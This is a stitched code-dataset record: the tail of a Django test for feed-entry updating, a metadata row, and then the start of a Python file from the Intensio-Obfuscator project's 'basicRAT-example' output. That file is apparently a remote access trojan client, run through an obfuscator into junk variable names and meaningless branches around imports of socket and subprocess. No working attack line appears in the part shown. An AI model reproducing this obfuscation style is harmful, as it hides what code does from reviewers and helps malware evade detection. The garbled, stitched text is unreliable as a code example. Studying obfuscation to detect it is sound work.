mock_fetch.return_value = self.feed_dict
mock_parse.side_effect = self.parsed_entries
# Save all entries after the first 10 entries
new_entries = 10
for entry in self.parsed_entries[new_entries:]:
self.feed.entries.create(**entry)
res = self.feed.update_feed_entries()
self.assertEqual(res, new_entries)
self.assertEqual(
mock_parse.call_count,
new_entries + settings.MAX_SAVED_ENTRIES_COUNT
)
def test_parsing_unassociated_entries(self, mock_fetch, mock_parse):
mock_fetch.return_value = self.feed_dict
mock_parse.side_effect = self.parsed_entries
# Save three entries
# with links that are in current feed
e1 = Entry.objects.create(**self.parsed_entries[0])
e2 = Entry.objects.create(**self.parsed_entries[14])
e3 = Entry.objects.create(**self.parsed_entries[-1])
# Save a fourth entry whose link is not
# in the current feed
e4 = Entry.objects.create(link='https://www.unrelated-feed.com/')
res = self.feed.update_feed_entries()
self.assertEqual(res, self.total_entries)
self.assertEqual(self.feed.entries.count(), self.total_entries)
self.assertIn(e1, self.feed.entries.all())
self.assertIn(e2, self.feed.entries.all())
self.assertIn(e3, self.feed.entries.all())
self.assertNotIn(e4, self.feed.entries.all())
| 10,342 | 43 | 682 |
469949c76743edf2d55f59e5b288ae57e2e866c5 | 70,296 | py | Python | intensio/examples/python/intermediate/output/basicRAT-example/ItAvGNeiuyvPMOGsZIzXIVBRyHPHRAwkpnsoyvPsfARqNqWfJInnIyGCFSGxjyC.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | 1 | 2020-02-25T10:54:44.000Z | 2020-02-25T10:54:44.000Z | intensio/examples/python/intermediate/output/basicRAT-example/ItAvGNeiuyvPMOGsZIzXIVBRyHPHRAwkpnsoyvPsfARqNqWfJInnIyGCFSGxjyC.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | null | null | null | intensio/examples/python/intermediate/output/basicRAT-example/ItAvGNeiuyvPMOGsZIzXIVBRyHPHRAwkpnsoyvPsfARqNqWfJInnIyGCFSGxjyC.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = 'RXLQksAGmIIuwhBJUptxVuytBrDBAdGQAQvkSrGtgiSFnGSZospnORAnCEZHCBz'
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = 'RICsbwNkCOqPrHxHGDwjHTJCAhHPGiRZSFzrFITzFLmZFDDAuBRtAxtkQzDUuGg'
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = 'RlQqIOyQNICOIGoFHqDFIoZQFOjWRBBARHSuPBDyRvrvGqgYJtvxYSWSrSGIwqI'
tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ = 'RqOFwYDPEAExFHFSmzQJjkJwExAoABQCZvXSSrCfLCalJEExvIAOzHERyvxzAVy'
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = 'CHImoEVySFSFEvkpOyAmuzBNCzwASPrsQCsCqnzOwSyGyHpRGNGJASuGjFGVQXn'
HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt = 'JGBDRuMQPHYBSFQzFDEGITFTjtPFPFuEXhsHJQGRQwvQPSwxoqXECqQqVPICHwk'
if FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF != tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in tlsIviJwUFnrJqFHMMxASrlquyGJjQAPvTGFTkYdRunCGzBEAPoRExzFJxRJXJ:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt != xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS = zmNDzvGHuIEXFHBBtGtCEpxpAQSFvzsESQMwGFYFyGQyEUBBoMCOCFPCRARREmS
else:
JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
if xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg == FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
for HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt in FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF:
if HRyrqOtsypSnHBzRBSrqSTREnxnZBuDIwHExwJRHOERJMeIAHBxAluyrvEnGyxt == xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
# -*- coding: utf-8 -*-
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
if AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ != GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi:
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
import socket
qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv = 'rEFtxByMzxySSqpGPrHPARJNFXPAHIvBEyxzJWCDSFFFeQYzPRuOJvWRtGOEIkC'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
if qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC == OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC
else:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
import subprocess
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
if JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq != uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP:
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
import struct
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
if JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts != oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw:
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
import sys
oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr = 'BFzDqIrFwIEFNqGCSuFBNzmDyrHFHlBGMCEZJzOvkPBqxjVEexyzDzNSOEqcytR'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
if oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw == GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw
else:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
try:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
if uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ != vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
from core.mlRSHnORJEINxGsriAJHTYHTPRECHHXCEJyGqrsOxjXFuEYyCypFDxmBgyzHeeR import uSIByGHznHHkkvwwPIVnIDFmmvPIHMRIyINSxzREPRIJQsuHBAIBMOtBQvIltFA, SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg, vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = 'DXFYzLoSNrnpOIHygzGHvQxDUmRwCAfuFRHCpnoHCzDGBGJDSRJJGMItQFePIvd'
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = 'cxIEAGnVCYFEpCztxNhVwuwyTYCArNpuzAxvppCQIxECPJJSSozNRIrlORyYFxE'
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = 'tSIUjAARBvfnIdruXHANvSJRgteCDICAYGIIePByDHRDOzhkFCNpeGRDJyOiUCB'
pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz = 'qGjSzLmgyoqsERyIREfXlqBeGPTHZQHgSySySRGDmNyLpIHDPYOmQSuPEIBCzpw'
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = 'JMPjSiPGFEoBSIQFsiJYMRBSdGxpGUAFhFSyBAuRCErFyDItFBFOhESIEPNPJm'
QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD = 'JEEqpDtqMJGMFzNISmGVBFSTlyXSDIOMWGQEHIRuNQsPIfoJhsORFwpzRGYnHws'
if CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH != pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD != EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF
else:
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
if EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf == CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD == EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
from core.GDBuGjtzDtAHlDJHwyDFJHNFQRIzdBRqORcFFxozwRRvCDdBHFDPIFSjpTysrjO import vIRwVSrRIoGDyAzHuoJjtNEGPQATAHFuAoCIjSvXYCAHcDGzOHiuVDIDtwoJGpy, kyvylzQylABvsJoPANuHBJzJofEFAOEIIiJpCEDRxoQNolMqHtFCHxSyBSrFSCC
try:
CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG = 'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw'
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = 'GFBCoZBzQWRzGJAZHrqRSDtXLUSuAvrtnrJGBZzwIAvrPryfWHGDHSXtVDwxpoE'
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = 'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy'
IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR = 'jYBPkZBwSJlOTPUdRGhUJoEjEHHHJxuOzTHwuNTTxRmHsFoxBmnrOtJuuCPGYt'
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = 'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt'
ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE = 'vSjqPGJzXuFxPECGAAuxIivVryxzmNxzsQGttPODSzROIJXByPXDwDGIPkDGzGo'
AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD = [
'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw',
'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy',
'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt',
'FFySBiaROmFYyHMGFkNTPgRPHkxYJSEpwkYjiIBEtAZrFIQvEAvhjxQFBDSJRMl'
]
for CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG in ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE:
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB:
if IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR == psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG
elif psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR == LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
else:
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD:
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv
except Exception:
pass
from core.GEnMoqyyUuvxIDthAUEBVJIqDBEBXGAIHQeiUjsBHwSGDFHmysGkCyGRwQClFDE import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
if CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt != hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw:
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
from core.xMPjIiIPERPCuRrUryvQHyYqqrRGnXzziqxujxkWElGFIQBpyPhzJCPRRQIHQw import HCEwqSIvzuVuOsqtHkJSBDxBGyvADGEjjJGIDlvrESExqlHvSQSszJEkDPJGOBQ
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = 'IPGzINsnUSQMFwPIPpHeDazBsuRiRMWouOtSeeyySTrvIsRUtHiQYBGrIZkPrBx'
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = 'BuvJRRKHUyHIxIxDGQvRpJCwnRRpItCbAsetFYIvvYsJIBzUAvHMIynnqDOGDRF'
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = 'ArszGIACFSzvXmMHJQCPuHFyFCOTSFBZzHCkhjCNQEHMqDjyQoJaxSGxCHCCGlS'
HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB = 'kIlxMyOGZHTzgfyvSHBFqIsVIzJBjrAFEPITyIqZIZDoERTEjwTvFICBSBHGASP'
xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN = 'yFayRNgJgvOHtzRFFSpFsGePwxMCGjJISQWDCrHERPhuwSWJCQJDZvMwAsPruHv'
